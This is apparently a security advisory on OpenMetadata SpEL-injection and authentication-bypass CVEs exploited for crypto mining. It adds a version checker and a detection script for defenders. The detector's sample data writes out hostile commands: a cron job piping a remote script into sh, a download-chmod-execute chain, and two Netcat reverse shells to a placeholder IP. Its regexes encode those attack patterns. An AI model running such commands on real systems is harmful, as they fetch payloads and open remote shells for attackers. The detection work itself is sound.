Attack

OpenMetadata platform flaws exploited to mine cryptocurrency

Take action: If you run OpenMetadata anywhere in your infrastructure, stop deferring the patch. Take the instance off the public internet now and upgrade to a fixed release as soon as possible. An attacker who gets in will at minimum run up your cloud bill with crypto miners, and at worst holds a foothold on the servers themselves.


Learn More

The OpenMetadata metadata management platform is under active attack through several vulnerabilities disclosed in March 2024. The attackers have used them primarily to gain unauthorized access to Kubernetes workloads running OpenMetadata and to mine cryptocurrency on them.

The vulnerabilities, identified and disclosed by security researcher Alvaro Muñoz, include:

  • CVE-2024-28847 (CVSS score: 8.8): A Spring Expression Language (SpEL) injection vulnerability within the PUT /api/v1/events/subscriptions endpoint. It was patched in version 1.2.4.
  • CVE-2024-28848 (CVSS score: 8.8): A similar SpEL injection vulnerability in the GET /api/v1/policies/validation/condition/<expr> endpoint, also fixed in version 1.2.4.
  • CVE-2024-28253 (CVSS score: 8.8): Another SpEL injection vulnerability in the PUT /api/v1/policies endpoint, which was resolved in version 1.3.1.
  • CVE-2024-28254 (CVSS score: 8.8): A SpEL injection vulnerability within the GET /api/v1/events/subscriptions/validation/condition/<expr> endpoint, fixed in version 1.2.4.
  • CVE-2024-28255 (CVSS score: 9.8): An authentication bypass vulnerability, fixed in version 1.2.4, which lets an unauthenticated attacker reach the endpoints above and so chain into remote code execution.
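Because the fixes are split across two releases (1.2.4 and 1.3.1), it is easy to think a 1.2.x upgrade closed everything when CVE-2024-28253 is still open. The script below, an added example rather than OpenMetadata project code, compares a version string against the fixed-in versions listed above and names the CVEs that remain. The fetch_version() helper assumes the instance answers GET /api/v1/system/version with JSON carrying a "version" field; confirm that against your own deployment before relying on it.

```python
"""Report which of the five CVEs above are still open for a given OpenMetadata version.

Added example, not OpenMetadata project code. The fixed-in versions are the
ones listed in the advisories above. fetch_version() assumes the instance
answers GET /api/v1/system/version with JSON carrying a "version" field;
confirm that against your own deployment before relying on it.
"""
from __future__ import annotations

import json
import re
import sys
import urllib.request

# (major, minor, patch, is_release) per CVE, taken from the advisory list above.
# is_release distinguishes 1.3.1 from a 1.3.1-SNAPSHOT build that predates the fix.
FIXED_IN = {
    "CVE-2024-28847": (1, 2, 4, 1),
    "CVE-2024-28848": (1, 2, 4, 1),
    "CVE-2024-28253": (1, 3, 1, 1),
    "CVE-2024-28254": (1, 2, 4, 1),
    "CVE-2024-28255": (1, 2, 4, 1),
}

VERSION_RE = re.compile(r"v?(\d+)\.(\d+)(?:\.(\d+))?(-[0-9A-Za-z.]+)?")


def parse_version(text: str) -> tuple[int, int, int, int]:
    """'1.3.1' -> (1, 3, 1, 1); 'v1.2' -> (1, 2, 0, 1); '1.3.1-SNAPSHOT' -> (1, 3, 1, 0).

    A pre-release suffix sorts below the final release of the same number, so a
    snapshot or rc build is never reported as fixed.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, suffix = m.groups()
    return int(major), int(minor), int(patch or 0), 0 if suffix else 1


def unpatched_cves(version: str) -> list[str]:
    """CVEs whose fix release is newer than the running version, in advisory order."""
    running = parse_version(version)
    return [cve for cve, fixed in FIXED_IN.items() if running < fixed]


def fetch_version(base_url: str, timeout: float = 5.0) -> str:
    """Read the version from a live instance (assumed endpoint; adjust if yours differs)."""
    url = base_url.rstrip("/") + "/api/v1/system/version"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)["version"]


if __name__ == "__main__":
    # python check_om_version.py https://openmetadata.example.internal   (query a live instance)
    # python check_om_version.py 1.3.0                                   (offline check)
    target = sys.argv[1] if len(sys.argv) > 1 else "1.2.3"
    version = fetch_version(target) if target.startswith("http") else target
    pending = unpatched_cves(version)
    if pending:
        print(f"OpenMetadata {version}: still exposed to {', '.join(pending)}; upgrade and keep it off the internet")
        sys.exit(1)
    print(f"OpenMetadata {version}: none of the five CVEs above outstanding")
```

The non-zero exit code makes the check easy to drop into a fleet inventory or CI job. A SNAPSHOT or rc build of a fixed version is deliberately reported as unpatched, since such builds can predate the fix; only the final 1.3.1 or later clears all five entries.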

Microsoft Threat Intelligence reports that these vulnerabilities are being chained in the wild to bypass authentication, execute code remotely, and deploy cryptocurrency-mining malware. The threat actors targeted unpatched, internet-facing OpenMetadata installations, first gaining code execution inside the containers running the OpenMetadata image.

Once inside, the attackers carried out extensive reconnaissance of the compromised environment, collecting network and hardware configuration, operating system details, and other information about the host.

Their ultimate aim was to install crypto-mining malware, downloaded from a server in China in either a Windows or a Linux build depending on the host. After installation the initial payloads were deleted, persistence was established through cron jobs, and a reverse shell was opened with Netcat, giving the attackers interactive control over the system.
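The two post-exploitation behaviours named above, a cron job that re-fetches and runs a payload and a Netcat reverse shell, leave visible traces in the crontab and the process table. The script below is an added example, not from the Microsoft report or the OpenMetadata project; its regexes encode the generic shape of those techniques rather than any published indicator, and the sample crontab and process lines are constructed for the demo.

```python
"""Look for the persistence and C2 behaviours the article attributes to the
intrusion: a cron entry that re-fetches and runs a remote payload, and a
Netcat reverse shell in the process list.

Added example, not from the Microsoft report or the OpenMetadata project.
The regexes encode the generic shape of those techniques, not published
indicators, and the sample crontab and process lines are constructed.
"""
from __future__ import annotations

import re
import subprocess
from dataclasses import dataclass

# A downloader whose output is piped into a shell, or that is chained into chmod/exec.
DOWNLOAD_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b[^\n]*(?:\|\s*(?:ba)?sh\b|&&\s*(?:chmod|bash|sh)\b)"
)
# nc/ncat with a shell bound to the connection, or the mkfifo variant used when nc lacks -e.
NETCAT_SHELL = re.compile(
    r"\b(?:nc|ncat|netcat)\b.*\s-[A-Za-z]*[ec]\s*/bin/(?:ba)?sh"
    r"|\bmkfifo\b.*\b(?:nc|ncat|netcat)\b"
)


@dataclass(frozen=True)
class Finding:
    source: str   # "crontab" or "process"
    line: str     # the offending line, unchanged
    reason: str


def scan_crontab(text: str) -> list[Finding]:
    """Flag crontab entries that download and execute something on a schedule."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_AND_RUN.search(line):
            findings.append(Finding("crontab", line, "scheduled download-and-execute"))
    return findings


def scan_processes(lines: list[str]) -> list[Finding]:
    """Flag process command lines that look like a Netcat reverse shell."""
    findings = []
    for line in lines:
        if NETCAT_SHELL.search(line):
            findings.append(Finding("process", line, "netcat bound to a shell"))
    return findings


def live_inputs() -> tuple[str, list[str]]:
    """Collect the current user's crontab and the process table on a Linux host."""
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    ps = subprocess.run(["ps", "-eo", "pid,user,args", "--no-headers"],
                        capture_output=True, text=True).stdout
    return cron, ps.splitlines()


# Constructed sample data: one benign cron job and two persistence entries, then a
# process table with one -e reverse shell, one mkfifo reverse shell and one benign nc.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
@reboot wget -q -O /tmp/.k http://203.0.113.7/k && chmod +x /tmp/.k && /tmp/.k
"""
SAMPLE_PROCESSES = [
    "1023 root /usr/bin/containerd",
    "4471 openmetadata java -jar /opt/openmetadata/openmetadata.jar",
    "5120 openmetadata nc -e /bin/sh 203.0.113.7 4444",
    "5133 openmetadata sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.7 4444 >/tmp/f",
    "5200 root nc -z localhost 8585",
]

if __name__ == "__main__":
    import sys
    cron, procs = live_inputs() if "--live" in sys.argv else (SAMPLE_CRONTAB, SAMPLE_PROCESSES)
    for f in scan_crontab(cron) + scan_processes(procs):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

Run it with --live on the host or inside the container to check the real crontab and process list; without that flag it runs over the constructed samples. Because the attackers removed their initial payloads, the cron entry and the live nc process are often what remains to find, which is why the script reads the scheduler and the process table rather than looking for files on disk.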

An unusual detail of this operation was a personal note left by the attacker, claiming poverty and a need to raise money for personal expenses, while professing a dislike of illegal activity.

OpenMetadata users are urged to upgrade to a fixed release (1.3.1 or later covers all five CVEs), enforce strong authentication, remove default credentials, and keep the instance off the public internet.